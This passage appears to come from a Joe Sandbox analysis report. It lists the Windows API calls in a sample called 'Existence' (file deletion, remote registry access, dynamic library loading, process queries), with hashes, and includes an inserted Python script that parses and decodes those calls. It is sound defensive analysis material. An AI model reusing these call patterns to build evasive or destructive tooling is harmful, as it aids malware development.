  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007C3A45
  • DestroyWindow.USER32(?), ref: 007C3A4D
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                          • String ID: SysAnimate32
                                                                                                                                                                                          • API String ID: 3529120543-1011021900
                                                                                                                                                                                          • Opcode ID: b50cccd5e53f10884e95961e572c735215018112312bc1d294b1cea1e6081c68
                                                                                                                                                                                          • Instruction ID: 91b15f9cc319cbe1d03114f86464b86ef66572e39c7c984677a0482b76f993a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: b50cccd5e53f10884e95961e572c735215018112312bc1d294b1cea1e6081c68
                                                                                                                                                                                          • Instruction Fuzzy Hash: F721D171200A09AFEF109F64DC84FBF77A9EB45368F10D22DFA9192190C379DD509760
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0075508E,?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002), ref: 007550FD
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00755110
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0075508E,?,?,0075502E,?,007F98D8,0000000C,00755185,?,00000002,00000000), ref: 00755133
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                          • Opcode ID: 2a74d6210b1c85aae7ff60fc440c354ac7e77aa3f210fd1a235373f2131bfbc6
                                                                                                                                                                                          • Instruction ID: c132f15a7177ea5ae9f10a398b5563c169a23feacc4765162885cdb0f03a6228
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a74d6210b1c85aae7ff60fc440c354ac7e77aa3f210fd1a235373f2131bfbc6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CF03C30A0060CBBDB219F95DC59BEDBFB6EF04762F454069A809A2260DB799E44CA94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32 ref: 0078E785
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0078E797
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0078E7BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                          • API String ID: 145871493-2590602151
                                                                                                                                                                                          • Opcode ID: 59e6a18dfcba3e4b3f36fc4203fceba7c0df53c68f5c43581c0ef5f58f1cdff7
                                                                                                                                                                                          • Instruction ID: c4ce6d19ea42560ddc5b6062453c294c214cfff308d83a4c0f908e0ae8dc1fc2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 59e6a18dfcba3e4b3f36fc4203fceba7c0df53c68f5c43581c0ef5f58f1cdff7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FE02270A82624DFD7B17B204C88E6A7329AF20B01B1642ACF902E2160EB3CCC448798
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073664A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0073665C
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0073668B,?,?,007362FA,?,00000001,?,?,00000000), ref: 0073666E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                          • API String ID: 145871493-3689287502
                                                                                                                                                                                          • Opcode ID: bc39362dcab66ad12195e5f7d1a93d037575f2ff825e15845c763ba72e946833
                                                                                                                                                                                          • Instruction ID: 0c4608937dc4680914f4154b8b0f57ff3167beffa196be734c51a475574e73ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: bc39362dcab66ad12195e5f7d1a93d037575f2ff825e15845c763ba72e946833
                                                                                                                                                                                          • Instruction Fuzzy Hash: 63E086356015226BA2312725AC09F6AA7299F82B52F0A812DF904D2240DB5CCC0180B8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736610
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00736622
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00775657,?,?,007362FA,?,00000001,?,?,00000000), ref: 00736635
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                          • API String ID: 145871493-1355242751
                                                                                                                                                                                          • Opcode ID: ec64a4956fc33f9090a5afb6d40b5337b734ec765fbd7879861394294e269a63
                                                                                                                                                                                          • Instruction ID: 04a07c15ddaa70afa0378499aad0ff95d54d7a4405cf7c2dbae3733cdb43f7db
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec64a4956fc33f9090a5afb6d40b5337b734ec765fbd7879861394294e269a63
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29D05B35612935FB523227257C19E9F6B269ED1F5131A843DF904A2124CF6DCD01C5EC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A35C4
• DeleteFileW.KERNEL32(?), ref: 007A3646
• CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007A365C
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A366D
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007A367F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: File$Delete$Copy
• String ID:
• API String ID: 3226157194-0
• Opcode ID: 15fd54a449c1f095e19f501e20fcb961e33fb394bb33286e9fd96f484290b37b
• Instruction ID: 6390545dc239f96de0ae29713ed2147b3e69951a6c299525b6f25e1b5ebeafca
• Opcode Fuzzy Hash: 15fd54a449c1f095e19f501e20fcb961e33fb394bb33286e9fd96f484290b37b
• Instruction Fuzzy Hash: F8B15C72D00119EBDF25DFA4CC89EDEBBBDEF49300F0041A6F509A6142EA789B458B61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32 ref: 007BAE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BAE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BAEC8
• CloseHandle.KERNEL32(?), ref: 007BB09D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
• Opcode ID: 0d57f51c10b720cc2b897223904aa1df1f3c353b0e9dc50ce67bc1ca3a6b9199
• Instruction ID: 709e9d51241ddd27fb85463736cc3b938e060b63496d6ec834b4294f23c13aac
• Opcode Fuzzy Hash: 0d57f51c10b720cc2b897223904aa1df1f3c353b0e9dc50ce67bc1ca3a6b9199
• Instruction Fuzzy Hash: DFA1A1B1604301EFE720EF24C88AF2AB7E5AF44710F54885DF9999B2D2D7B5EC408B91
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007BC560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 007BC5C3
• RegCloseKey.ADVAPI32(?,?), ref: 007BC606
• RegCloseKey.ADVAPI32(00000000), ref: 007BC613
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
• Opcode ID: 6c8569473d946528145ee06c7a62a6605bf0b05d06fb679e71b291658b1d2102
• Instruction ID: 720bd494c5227369e430d9d1a67a46c59f4798385ab90d210d1b25e19f709217
• Opcode Fuzzy Hash: 6c8569473d946528145ee06c7a62a6605bf0b05d06fb679e71b291658b1d2102
• Instruction Fuzzy Hash: E5617D71208241EFD725DF24C894F6ABBE5BF84308F54859CF0998B292DB35ED46CB92
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0079D7CD,?), ref: 0079E714
  • Part of subcall function 0079E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0079D7CD,?), ref: 0079E72D
  • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 0079ED8A
• MoveFileW.KERNEL32(?,?), ref: 0079EDC3
• _wcslen.LIBCMT ref: 0079EF02
• _wcslen.LIBCMT ref: 0079EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0079EF67
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
• Opcode ID: 42e096198c02471aaf4630b276bc9bf1a16fab2329aaee60d27140307949fa11
• Instruction ID: 156ff0e273e78dce8a2f38bdcb41ff756c677689f44488d364d2a025237eadcd
• Opcode Fuzzy Hash: 42e096198c02471aaf4630b276bc9bf1a16fab2329aaee60d27140307949fa11
• Instruction Fuzzy Hash: EB5175B2508385DBDB24DB90D8959DBB3ECEF84300F00492EF689D3152EF79A6888756
Uniqueness
• Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(?), ref: 00799534
• VariantClear.OLEAUT32 ref: 007995A5
• VariantClear.OLEAUT32 ref: 00799604
• VariantClear.OLEAUT32(?), ref: 00799677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007996A2
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
• Opcode ID: c015232e09b212b4f5be6cf8a4bcf46454d1b9258a8cf960de49319c22271b3c
• Instruction ID: 286f76d621c024048183565179e4206463af246a279275fb62b164561fa4c2c6
• Opcode Fuzzy Hash: c015232e09b212b4f5be6cf8a4bcf46454d1b9258a8cf960de49319c22271b3c
• Instruction Fuzzy Hash: 8B5149B5A00619EFDB14CF68D884EAAB7F8FF88310B15856DEA05DB310E734E911CB90
Uniqueness
• Uniqueness Score: -1.00%
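The "APIs" lines in these function entries are the part of the report an analyst usually mines first, and the numeric arguments are easier to read once decoded (the OpenProcess access mask 00000410 in the entry at 007BAE87, the VARTYPE 00000013 passed to VariantChangeType in the entry at 007996A2). The following Python is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses API lines in the report's own format (including the indented "Part of subcall function" lines) into structured records, groups them by module, and decodes those two constants using the documented Win32 PROCESS_* and VT_* values. The sample input is copied from the entries above; the parser's field layout and the helper names are this example's own choices.

```python
"""Parse the per-function "APIs" lines of a Joe Sandbox report and decode
two of the numeric constants that appear in them.  Added example; not part
of the report."""
import re

# Lines copied from the report entries above (constructed test input).
SAMPLE_LINES = """
• GetCurrentProcessId.KERNEL32 ref: 007BAE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007BAE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 007BAEC8
• CloseHandle.KERNEL32(?), ref: 007BB09D
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007996A2
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE, an optional "(args)" list, and the "ref: XXXXXXXX" call site.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Documented Win32 process access rights (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

# Documented OLE automation VARTYPE base values (wtypes.h).
VARTYPE = {
    0: "VT_EMPTY", 1: "VT_NULL", 2: "VT_I2", 3: "VT_I4", 4: "VT_R4", 5: "VT_R8",
    6: "VT_CY", 7: "VT_DATE", 8: "VT_BSTR", 9: "VT_DISPATCH", 10: "VT_ERROR",
    11: "VT_BOOL", 12: "VT_VARIANT", 13: "VT_UNKNOWN", 14: "VT_DECIMAL",
    16: "VT_I1", 17: "VT_UI1", 18: "VT_UI2", 19: "VT_UI4", 20: "VT_I8",
    21: "VT_UI8", 22: "VT_INT", 23: "VT_UINT",
}


def parse_arg(tok):
    """'?' means the sandbox could not resolve the value; otherwise hex."""
    tok = tok.strip()
    if tok == "?":
        return None
    return int(tok, 16)  # int() accepts the leading '-' the report uses


def parse_api_lines(text):
    """Return one dict per API line; lines in any other format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [parse_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
            "caller": int(m.group("caller"), 16) if m.group("caller") else None,
        })
    return calls


def decode_process_access(mask):
    """Split an OpenProcess desired-access mask into named rights."""
    names = [n for bit, n in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")  # bits this table does not cover
    return names


def decode_vartype(vt):
    """Name a VARTYPE, keeping the VT_ARRAY / VT_BYREF modifier bits."""
    name = VARTYPE.get(vt & 0x0FFF, f"VT_0x{vt & 0x0FFF:X}")
    if vt & 0x2000:
        name += "|VT_ARRAY"
    if vt & 0x4000:
        name += "|VT_BYREF"
    return name


def summarize(calls):
    """Module -> sorted unique API names (an inventory like the report's API ID)."""
    by_module = {}
    for c in calls:
        by_module.setdefault(c["module"], set()).add(c["api"])
    return {m: sorted(v) for m, v in by_module.items()}


def annotate(calls):
    """Map call-site address -> decoded constant for the calls we know how to read."""
    notes = {}
    for c in calls:
        if c["api"] == "OpenProcess" and c["args"] and c["args"][0] is not None:
            notes[c["ref"]] = "|".join(decode_process_access(c["args"][0]))
        elif c["api"] == "VariantChangeType" and len(c["args"]) == 4 and c["args"][3] is not None:
            notes[c["ref"]] = decode_vartype(c["args"][3])  # 4th argument is the target vt
    return notes


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    for ref, note in sorted(annotate(parsed).items()):
        print(f"{ref:08X}: {note}")
    print(summarize(parsed))
```

Run against the lines copied above, the OpenProcess at 007BAE95 decodes to PROCESS_VM_READ|PROCESS_QUERY_INFORMATION and the VariantChangeType at 007996A2 to VT_UI4; the report itself does not say what the sample does with either result, so the decoding is only an aid to reading the listing, not a conclusion about behaviour.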

APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007A95F3
• GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007A961F
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007A9677
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007A969C
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007A96A4
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2832842796-0
                                                                                                                                                                                          • Opcode ID: 0a467055e0b1bc3e03d1ec69bd88b15cd007e27399ec6f69310386c8c286ea67
                                                                                                                                                                                          • Instruction ID: a95a24eb6ee6e0572fbe13de1ec7426b1e2acdc7d7fe18ff11a8a59133c67f02
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a467055e0b1bc3e03d1ec69bd88b15cd007e27399ec6f69310386c8c286ea67
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD514A35A00618EFDB01DF64C885AAABBF5FF49314F048058E949AB362CB39ED51CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 007B999D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007B9A2D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 007B9A49
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007B9A8F
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 007B9AAF
                                                                                                                                                                                            • Part of subcall function 0074F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007A1A02,?,753CE610), ref: 0074F9F1
                                                                                                                                                                                            • Part of subcall function 0074F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00790354,00000000,00000000,?,?,007A1A02,?,753CE610,?,00790354), ref: 0074FA18
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 666041331-0
                                                                                                                                                                                          • Opcode ID: a7aa24119d75cb9c4f1111f97ce38217ded3e99b0d39de02345190b27b93754a
                                                                                                                                                                                          • Instruction ID: 6393f9dc2c7aa8528ee3c5e90b7793331e0e884126cefd9cab107260258165e6
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7aa24119d75cb9c4f1111f97ce38217ded3e99b0d39de02345190b27b93754a
